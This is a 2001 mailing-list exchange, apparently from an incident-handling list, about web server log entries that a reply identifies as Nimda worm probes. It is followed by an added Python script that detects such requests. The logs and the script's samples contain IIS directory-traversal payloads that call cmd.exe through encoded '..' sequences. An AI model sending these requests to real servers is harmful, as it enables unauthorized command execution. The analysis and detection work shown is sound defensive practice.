It has a reverse lookup (64.148.216.72) but no forward lookup. That IP block is indeed owned by Internetconnect. Looks like simple Nimdaness to me.

-Mike

At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:
>Hi,
>
>I just got this. Is it just me, or is this address spoofed?
>Can anyone resolve dsl-6414821672.internetconnect.net?
>
>dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
>dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 302 279 "-" "-"
>dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 302 279 "-" "-"
>dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
>dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
>
>
>
>--
>Emre Yildirim <emreat_private>
>GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com)
>
>
>----------------------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management and
>tracking system please see: http://aris.securityfocus.com
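
The requests in the quoted log excerpt hide `..\` and `../` behind double percent-encoding (`%255c`) and two-byte sequences (`%c1%1c`, `%c0%2f`). The following Python is an added example, not part of the original messages: it canonicalizes each logged request and reports why it matches. The function names, the lenient two-byte decoding model and the category labels are assumptions made here, and one timestamp is reused across the sample lines.

```python
import re
from urllib.parse import unquote_to_bytes

# Targets from the log excerpt quoted above; "/index.html" is constructed.
LINE = ('dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] '
        '"GET {} HTTP/1.0" 302 279 "-" "-"')
SAMPLES = [LINE.format(t) for t in (
    "/scripts/root.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "/index.html",
)]
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')

def lenient_decode(raw: bytes) -> str:
    # Fold a 0xC0/0xC1 lead byte plus ANY next byte into one character: the
    # permissive reading under which c1 1c becomes "\" and c0 2f becomes "/".
    fold = lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])
    return re.sub(rb"[\xc0\xc1].", fold, raw, flags=re.S).decode("latin-1")

def canonicalize(target: str, max_rounds: int = 5):
    """Percent-decode until stable; return (normalized path, decode rounds)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = lenient_decode(unquote_to_bytes(target.encode("latin-1", "replace")))
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target.replace("\\", "/").lower(), rounds

def classify(log_line: str) -> list:
    """Return the reasons a logged request looks like a traversal/shell probe."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    raw = m.group(1).split("?", 1)[0]
    path, rounds = canonicalize(raw)
    checks = [
        ("double-encoding", rounds > 1),
        ("overlong-utf8", re.search(r"%c[01]%", raw, re.I) is not None),
        ("traversal", "/../" in path),
        ("shell-request", path.endswith(("/cmd.exe", "/root.exe"))),
    ]
    return [name for name, hit in checks if hit]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), REQUEST_RE.search(line).group(1))
```

Matching on the canonical form rather than on the raw string is what lets one rule cover all three encodings seen in the excerpt.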
This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 14:31:24 PDT